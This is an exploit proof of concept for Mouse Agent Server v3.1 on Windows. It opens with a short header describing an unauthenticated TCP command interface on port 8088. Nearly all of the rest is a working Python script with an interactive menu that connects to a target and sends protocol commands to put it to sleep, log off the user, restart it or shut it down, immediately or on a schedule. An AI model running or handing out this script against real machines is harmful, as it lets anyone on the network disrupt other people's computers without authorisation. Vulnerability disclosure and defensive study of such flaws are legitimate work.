# Exploit Title: Mouse Agent Server v3.1 - Remote Power Control
(Shutdown/Reboot/Logoff)
# Date: 19/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.docs.kr/
# Software Link: http://192.168.8.100:8080/ (IOS/Android Mobile App
Interface)
# Version: 3.1 (Windows)
# Tested on: Windows 10 / Windows 11


'''
Description:

Mouse Agent Server v3.1 exposes a TCP control interface on port 8088 that
allows remote execution of power commands (shutdown, restart, sleep,
logoff) via unauthenticated commands. An attacker on the same network can
exploit this to disrupt the system remotely without user interaction.

'''

import socket
import time


class Colors:
    RED = '\033[91m'
    YELLOW = '\033[93m'
    END = '\033[0m'

class MouseAgentController:
    def __init__(self, host, port=8088, password=None):
        self.host = host
        self.port = port
        self.password = password
        self.sock = None

    def connect(self):
        try:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.settimeout(5)
            self.sock.connect((self.host, self.port))


            self._send_raw("LIN:")
            response = self._receive_response()

            if "LIN:PASS" in response:
                if not self.password:
                    self.password = input("Server requires password: ")
                self._send_raw(f"LIN:{self.password}")
                response = self._receive_response()
                if "LIN:OK" not in response:
                    print("✖ Authentication failed")
                    return False
            return True
        except Exception as e:
            print(f"✖ Connection error: {e}")
            return False

    def _send_raw(self, command):
        self.sock.sendall((command + "\r\n").encode())

        time.sleep(0.3)

    def _receive_response(self):
        return self.sock.recv(1024).decode().strip()

    def send_power_command(self, action, minutes=0):
        commands = {
            "sleep": "SCD:SLP",
            "logoff": "SCD:LOF",
            "restart": "SCD:RST",
            "shutdown": "SCD:OFF",
            "cancel": "SCD:DEL"
        }
        if action in commands:
            cmd = commands[action]
            if action != "cancel":
                cmd += f",{minutes}"
            self._send_raw(cmd)
            return True
        return False

    def close(self):
        if self.sock:
            self.sock.close()

def get_time_input():
    while True:
        try:
            hours = int(input("Enter hours (0-23): "))
            minutes = int(input("Enter minutes (0-59): "))
            if 0 <= hours <= 23 and 0 <= minutes <= 59:
                return hours * 60 + minutes
            print("Please enter valid time (hours: 0-23, minutes: 0-59)")
        except ValueError:
            print("Please enter numbers only")

def main():
    import argparse
    parser = argparse.ArgumentParser(description='MouseAgent Power Control')
    parser.add_argument('host', help='Server IP address')
    parser.add_argument('-p', '--port', type=int, default=8088,
help='Server port (default: 8088)')
    parser.add_argument('--password', help='Server password', default=None)
    args = parser.parse_args()

    controller = MouseAgentController(args.host, args.port, args.password)
    if not controller.connect():
        return

    try:
        while True:
            print("\n=== MouseAgent Power Control ===")
            print("Immediate Actions:")
            print("[1] Sleep now       [2] Log off now")
            print("[3] Restart now     [4] Shutdown now")
            print("\nScheduled Actions:")
            print("[5] Schedule Sleep  [6] Schedule Log off")
            print("[7] Schedule Restart [8] Schedule Shutdown")
            print("\n[9] Cancel All Scheduled Actions")
            print("[0] Exit")

            choice = input("\nSelect option: ").strip()

            if choice == '0':
                break

            actions = {
                '1': ("sleep", 0, f"{Colors.YELLOW}✓ Sleep command sent
(executes in ~60 seconds){Colors.END}"),
                '2': ("logoff", 0, f"{Colors.YELLOW}✓ Log off command sent
(executes in ~60 seconds){Colors.END}"),
                '3': ("restart", 0, f"{Colors.YELLOW}✓ Restart command sent
(executes in ~60 seconds){Colors.END}"),
                '4': ("shutdown", 0, f"{Colors.YELLOW}✓ Shutdown command
sent (executes in ~60 seconds){Colors.END}"),
                '5': ("sleep", None, f"{Colors.RED}✓ Sleep scheduled in
{{}}{Colors.END}"),
                '6': ("logoff", None, f"{Colors.RED}✓ Log off scheduled in
{{}}{Colors.END}"),
                '7': ("restart", None, f"{Colors.RED}✓ Restart scheduled in
{{}}{Colors.END}"),
                '8': ("shutdown", None, f"{Colors.RED}✓ Shutdown scheduled
in {{}}{Colors.END}"),
                '9': ("cancel", 0, f"{Colors.RED}✓ All scheduled actions
cancelled{Colors.END}")
            }

            if choice in actions:
                action, minutes, msg = actions[choice]
                if minutes is None:
                    delay = get_time_input()
                    controller.send_power_command(action, delay)
                    print(msg.format(f'{delay//60}h {delay%60}m'))
                else:
                    controller.send_power_command(action, minutes)
                    print(msg)
            else:
                print("✖ Invalid choice")

    finally:
        controller.close()
        print("✓ Disconnected")

if __name__ == "__main__":
    main()